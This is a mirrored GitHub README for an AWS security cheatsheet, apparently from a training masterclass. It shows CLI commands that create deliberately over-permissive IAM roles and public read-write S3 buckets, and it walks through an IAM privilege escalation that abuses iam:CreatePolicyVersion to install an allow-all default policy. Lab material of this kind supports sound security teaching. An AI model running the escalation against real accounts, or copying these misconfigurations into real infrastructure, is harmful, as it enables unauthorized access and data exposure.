Code Monkey home page Code Monkey logo

aws-cheatsheet's Introduction

AWS-cheatsheet

#overly permissive IAM roles

aws iam create-user --user-name s3ReadUser --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-user-policy --user-name s3ReadUser --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --profile masterclass

aws iam create-user --user-name EC2DescribeOnlyUser --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-user-policy --user-name EC2DescribeOnlyUser --policy-arn arn:aws:iam::aws:policy/AmazonEC2ReadOnlyAccess --profile masterclass aws iam create-group --group-name EC2ManagementUsers --profile masterclass aws iam attach-group-policy --group-name EC2ManagementUsers --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass aws iam add-user-to-group --user-name EC2DescribeOnlyUser --group-name EC2ManagementUsers --profile masterclass

aws iam create-role --role-name EC2RDSReadRole --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/IAMFullAccess --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass

#iam privilege escalation using policy version rollback , we can set default policy as well to previous version and escalate

Run an admin command like list-users to see that the limiteduser has no access

aws iam list-users --profile masterclasslimiteduser

Identify the policies attached to the user using the new profile with AWS CLI

aws iam list-attached-user-policies --user-name limiteduser --profile masterclasslimiteduser

Get the version of the identified policy - policyversionmanager

aws iam get-policy --policy-arn POLICY-ARN --profile masterclasslimiteduser

Get the permissions attached to the policy for version v1 - policyversionmanager

aws iam get-policy-version --policy-arn POLICY-ARN --version-id v1 --profile masterclasslimiteduser

One of the permissions attached is "iam:CreatePolicyVersion"

We can use this to create a new version of the attached policy with privileged access

aws iam create-policy-version --policy-arn POLICY-ARN --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"","Resource":""}]}' --set-as-default --profile masterclasslimiteduser

Run an admin command now to confirm your privileges have escalated to AWS AdministratorAccess

aws iam list-users --profile masterclasslimiteduser

#iam privilege escalation based on groups

image

EC2

AMI catalog:

https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#AMICatalog:

From console we can see the public AMI's which might be backdoor ami's as well.

Navigate to EC2 > AMI Catalog and find the “masterclass” AMI under Community AMIs

For AWS CLI ...

Run the following command to find AMIs belonging to the account 511522223657

aws ec2 describe-images --owners 511522223657 --profile masterclass

aws ec2 describe-images --owners 511522223657 --query 'Images[*].[ImageId, Name, PlatformDetails]' --profile masterclass

aws ec2 describe-images --filters "Name=name,Values=session5-warfare" --profile masterclass

image image

#use instance id to see if volume is encrypted or not

Use the instance id to enumerate attached volumes (also visible in the UI)

aws ec2 describe-instances --instance-ids --query "Reservations[].Instances[].BlockDeviceMappings[].Ebs[].VolumeId" --region us-east-1 --profile masterclass

aws ec2 describe-volumes --volume-ids --query "Volumes[].Encrypted" --region us-east-1 --profile masterclass

#Use the snapshot id to check for encryption status (also visible in the UI)

aws ec2 describe-snapshots --snapshot-ids snap-043dabe339601b7a0 --query "Snapshots[].Encrypted" --region us-east-1 --profile masterclass

#ec2 misconfigurations

image image

Check the security groups for inbound rules

image

SSRF using IMDS

image

Access and passrole , using policy version

image

#s3 bucket

export UNAME=curl -s http://x41.co/random.php export bucketname=$UNAME-public-bucket

aws s3api create-bucket --bucket $bucketname --region us-east-1 --profile masterclass aws s3api put-public-access-block --bucket $bucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-ownership-controls --bucket $bucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass wget https://aws-masterclass-data.s3.amazonaws.com/session3/boat.jpg wget https://aws-masterclass-data.s3.amazonaws.com/session3/public.txt aws s3api put-object --bucket $bucketname --key boat.jpg --body boat.jpg --profile masterclass aws s3api put-object --bucket $bucketname --key public.txt --body public.txt --profile masterclass aws s3api put-bucket-acl --bucket $bucketname --acl public-read-write --profile masterclass

export objbucketname=$bucketname-public-objects

aws s3api create-bucket --bucket $objbucketname --region us-east-1 --profile masterclass aws s3api put-public-access-block --bucket $objbucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-ownership-controls --bucket $objbucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass aws s3api put-object --bucket $objbucketname --key boat.jpg --body boat.jpg --profile masterclass aws s3api put-object --bucket $objbucketname --key public.txt --body public.txt --profile masterclass aws s3api put-bucket-acl --bucket $objbucketname --acl public-read-write --profile masterclass aws s3api put-bucket-policy --bucket $objbucketname --policy "{"Version":"2012-10-17","Statement":[{"Sid":"PublicRead","Effect":"Allow","Principal":"","Action":["s3:GetObject"],"Resource":["arn:aws:s3:::$objbucketname/"]}]}" --profile masterclass

export aclrwbucket=$UNAME-bucket-acl-rw

aws s3api create-bucket --bucket $aclrwbucket --region us-east-1 --profile masterclass aws s3api put-bucket-ownership-controls --bucket $aclrwbucket --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass aws s3api put-public-access-block --bucket $aclrwbucket --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-acl --bucket $aclrwbucket --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AllUsers --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --profile masterclass

image

lambda invocation

image image image image

RDS snapshots

image image image image image image

aws-cheatsheet's People

Contributors

mohdhaji87 avatar

Stargazers

5gyTwv8RpYZd5jE0J0QJx4WHG4e6oRRcDqIcREq2zxnuu8CMfhxFhsusSStlq3ibELlqRTVWsxulfHzV2K0EQb9xjtuPzNjnvVW avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.